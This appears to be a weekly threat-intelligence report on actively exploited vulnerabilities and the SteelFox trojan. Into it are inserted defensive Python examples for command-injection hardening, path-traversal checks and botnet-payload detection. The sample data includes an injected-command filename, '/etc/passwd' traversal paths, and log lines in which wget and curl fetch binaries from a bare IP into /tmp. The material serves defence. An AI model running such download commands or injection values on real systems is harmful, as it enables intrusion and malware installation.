Executive Summary
The first week of November brought significant cybersecurity concerns as six actively exploited vulnerabilities were added to CISA’s KEV catalog. Two zero-day exploits were uncovered in PTZOptics PT30X-SDI/NDI cameras, while Google responded to a high-risk Android Framework vulnerability in its November update. New additions include a vulnerability in CyberPanel, affecting web hosting environments, and a critical vulnerability in Palo Alto Networks' Expedition tool, potentially exposing networks to unauthorized access. Notably, an old vulnerability in Nostromo has resurfaced, underscoring the importance of monitoring for emerging threats in both new and legacy software.
Kaspersky warns of widespread attacks by the SteelFox trojan, which is targeting Windows systems with fake cracks for popular software, exploiting devices to mine cryptocurrency and steal sensitive data.
The IoT_Reaper botnet continues to exploit vulnerabilities in MVPower CCTV DVRs, maintaining its presence in the threat landscape. Meanwhile, the Zerobot botnet has turned its attention to an older vulnerability in the Apache HTTP server, dating back three years. Other well-known botnets, including Enemybot, LiquorBot, and the notorious Mirai, are also targeting a nine-year-old flaw in D-Link DIR 645 routers, demonstrating how aging vulnerabilities remain prime targets for attackers.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping security teams make informed prioritization decisions.
CVE-2024-8956 and CVE-2024-8957
Two critical zero-day vulnerabilities in PTZOptics PT30X-SDI/NDI cameras have been actively exploited by threat actors, granting them the ability to take full control of the affected devices, alter video streams and access sensitive data. These vulnerabilities impact devices running VHD PTZ camera firmware versions below 6.3.40, commonly found in cameras from PTZOptics, Multicam Systems SAS, and SMTAV Corporation, which use Hisilicon Hi3516A V600 SoC V60, V61, and V63. Recognizing the severity, CISA has added these vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog.
Google has patched a critical zero-day vulnerability in the Android Framework component as part of its November security update. This elevation-of-privilege vulnerability affects the Documents UI within Google Play system updates and Android Framework components. Google's advisory noted "indications that this vulnerability may be under limited, targeted exploitation," suggesting it is actively being used in specific, targeted attacks. Additionally, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the need for immediate action.
A critical remote code execution vulnerability has been identified in CyberPanel, specifically within the upgrademysqlstatus function in databases/views.py. This flaw, found in versions 2.3.6 and 2.3.7, allows unauthenticated attackers to bypass security middleware and exploit shell metacharacters in the statusfile property, leading to potential remote command execution. Due to its severity and widespread impact, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
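The defect class described above, a request-controlled value reaching a shell, is illustrated below with an added example. This is not CyberPanel's code: the function names, the STATUS_DIR location and the sample inputs are constructed for the illustration. It places the vulnerable pattern (the value interpolated into a shell string) beside the hardened one (an allow-listed name confined to one directory and passed as a single argv element with no shell), plus a log-side check for metacharacters in a request parameter.

```python
"""Command-injection pattern and its hardened form (added example, not CyberPanel's code)."""
import re
import subprocess
from pathlib import PurePosixPath

# Hypothetical directory for status files; a constructed value.
STATUS_DIR = PurePosixPath("/var/log/mysql-status")

# Allow-list for a bare file name: no separators, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")

# Characters a POSIX shell would interpret when the value is run through shell=True.
SHELL_METACHARACTERS = ";|&$`<>()\n"


def build_command_unsafe(statusfile: str) -> str:
    """Vulnerable pattern: the untrusted value is concatenated into a command string.
    Executed with shell=True, every metacharacter in `statusfile` is interpreted."""
    return "cat " + statusfile


def build_command_safe(statusfile: str) -> list:
    """Hardened pattern: validate against an allow-list, refuse '.'/'..', confine the
    name to STATUS_DIR, and return an argv list so no shell is ever involved."""
    if not SAFE_NAME.fullmatch(statusfile) or statusfile in (".", ".."):
        raise ValueError("statusfile must be a plain file name")
    return ["cat", str(STATUS_DIR / statusfile)]


def contains_shell_metacharacters(value: str) -> bool:
    """Detection helper for request logs: True when a parameter value carries
    characters a shell would interpret (a cheap signal worth alerting on)."""
    return any(ch in value for ch in SHELL_METACHARACTERS)


def run_safe(statusfile: str) -> subprocess.CompletedProcess:
    """Run the hardened command; shell=False means argv is passed verbatim to execve."""
    return subprocess.run(build_command_safe(statusfile), shell=False,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    sample = "status.log; id"  # constructed input carrying a metacharacter
    print("unsafe string:", build_command_unsafe(sample))
    print("flagged:", contains_shell_metacharacters(sample))
    print("safe argv:", build_command_safe("status.log"))
```

The allow-list is deliberately narrow; quoting the value with shlex.quote would also neutralise metacharacters, but removing the shell from the call path entirely is the more robust fix, and the argv form makes later review of what actually executes trivial.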
A critical missing authentication vulnerability in Palo Alto Networks’ Expedition tool, a vital asset for migrating firewall configurations to PAN-OS, poses a serious risk to organizations. Recently added to the CISA KEV catalog, this flaw highlights the elevated potential for exploitation, making it a priority for security teams. The issue is resolved in Expedition version 1.2.92 and all subsequent updates.
A critical directory traversal vulnerability in Nostromo nhttpd (version 1.9.6 and earlier) allows attackers to bypass security restrictions and execute malicious commands through crafted HTTP requests. With a CVSS score of 9.8, this vulnerability can lead to remote code execution and remains a significant security threat, despite being an older issue. Its addition to the CISA KEV catalog signals the urgency for organizations to address this flaw and secure affected systems.
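As an added example of the mitigation for the traversal class described above (not Nostromo's code; WEB_ROOT and the request paths are constructed), the function below resolves a requested URL path under a document root so that `..` segments, URL-encoded or not, cannot escape it, and a second helper gives a log-side heuristic for spotting traversal attempts in request lines.

```python
"""Safe path resolution under a document root (added example, not nhttpd's code)."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/srv/www"  # constructed document root


def resolve_under_root(request_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the normalised absolute filesystem path for request_path, or None
    when the path would resolve outside root or carries a NUL byte."""
    decoded = unquote(request_path)  # one decode pass turns %2e%2e into ..
    if "\x00" in decoded:
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    # The resolved path must be the root itself or a descendant of it.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def is_traversal_attempt(request_path: str) -> bool:
    """Log-side heuristic: True when the decoded path contains a '..' segment."""
    decoded = unquote(request_path)
    return ".." in decoded.split("/")


if __name__ == "__main__":
    for p in ("/index.html", "/docs/../index.html", "/../../etc/passwd",
              "/%2e%2e/%2e%2e/etc/passwd"):
        print(p, "->", resolve_under_root(p), "| traversal:", is_traversal_attempt(p))
```

Normalisation happens after decoding and before the containment check, which is the ordering that matters; symbolic links inside the root are a separate concern and would need os.path.realpath on the final candidate.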
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section covers vulnerabilities exploited by botnets, including recent CVEs logged in MISP, presenting the top 5 CVEs whose payloads are suggestive of botnet activity, such as wget invocations that fetch from bare IP addresses.
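The heuristic just mentioned, a download tool pointed at an IP literal inside a request payload, is shown below as an added detection example run over constructed sensor lines. The key=value log format and all addresses (RFC 5737 documentation ranges) are assumptions for the illustration, not Loginsoft or Cytellite data.

```python
"""Flag request payloads that drive wget/curl against a bare IPv4 address (added example)."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sensor lines in a hypothetical key=value format.
SAMPLE_LOG = [
    '2024-11-05T10:12:01Z src=198.51.100.23 uri="/cgi-bin/status?cmd=wget%20http%3A%2F%2F203.0.113.7%2Fbins%2Fx86%20-O%20%2Ftmp%2Fx"',
    '2024-11-05T10:12:44Z src=203.0.113.99 uri="/index.html"',
    '2024-11-05T10:13:02Z src=192.0.2.41 uri="/shell?cmd=curl%20-s%20203.0.113.7:8080/arm7%20-o%20/tmp/a"',
    '2024-11-05T10:14:17Z src=198.51.100.5 uri="/download?url=https%3A%2F%2Fexample.com%2Fupdate.tgz"',
]

LINE_RE = re.compile(r'src=(?P<src>\S+)\s+uri="(?P<uri>[^"]*)"')

# A download tool, optional flags, then an IPv4 literal with optional port and path.
DOWNLOAD_RE = re.compile(
    r"\b(?P<tool>wget|curl)\b\s+(?:-\S+\s+)*"
    r"(?:https?://)?(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^\s;|&]*)?"
)


def find_ip_download_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request whose URL-decoded URI invokes wget/curl against
    an IP literal. Hostname-based URLs are deliberately not flagged: the signal here
    is specifically the bare-IP staging server typical of botnet loaders."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        decoded = unquote(m.group("uri"))  # payloads arrive percent-encoded
        d = DOWNLOAD_RE.search(decoded)
        if not d:
            continue
        hits.append({
            "src": m.group("src"),
            "tool": d.group("tool"),
            "host": d.group("host"),
            "port": d.group("port") or "",
            "path": d.group("path") or "",
        })
    return hits


if __name__ == "__main__":
    for hit in find_ip_download_attempts(SAMPLE_LOG):
        print(hit)
```

The host field is what feeds an IoC list or a block rule; grouping hits by host across many sensors separates a single scanner from a campaign that stages the same binary path from one address.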
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
The Ballistix MOD Utility contains a critical local privilege escalation vulnerability in its MODAPI.sys driver (version 2.0.2.5 and earlier), which allows low-privileged users to gain unauthorized access to physical memory via the MmMapIoSpace function. Kaspersky reports that the SteelFox Trojan has actively exploited this vulnerability, using it to steal confidential information and conduct illicit cryptocurrency mining. Additionally, XMRig miner incorporates the vulnerable WinRing0.sys driver, leveraging it to facilitate unauthorized mining activities on compromised devices.
Security researchers have identified a critical vulnerability in the WinRing0_1_2_0 driver, integrated within EVGA’s Precision X1 software, which permits attackers with low privileges to escalate to SYSTEM-level access, executing commands without restriction. Kaspersky reports that this weakness has been targeted by the SteelFox Trojan, using the driver to gather sensitive information and conduct illicit cryptocurrency mining. Additionally, the same driver is embedded in the XMRig miner, making it a prime target for exploitation in mining operations.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2024/11/04/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2024/11/07/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://www.bleepingcomputer.com/news/security/hackers-target-critical-zero-day-vulnerability-in-ptz-cameras/
- https://www.labs.greynoise.io/grimoire/2024-10-31-sift-0-day-rce/
- https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zero-days-used-in-targeted-attacks/
- https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vulnerabilities-in-live-streaming-cameras-with-the-help-of-ai
- https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html
- https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/
- https://security.paloaltonetworks.com/CVE-2024-5910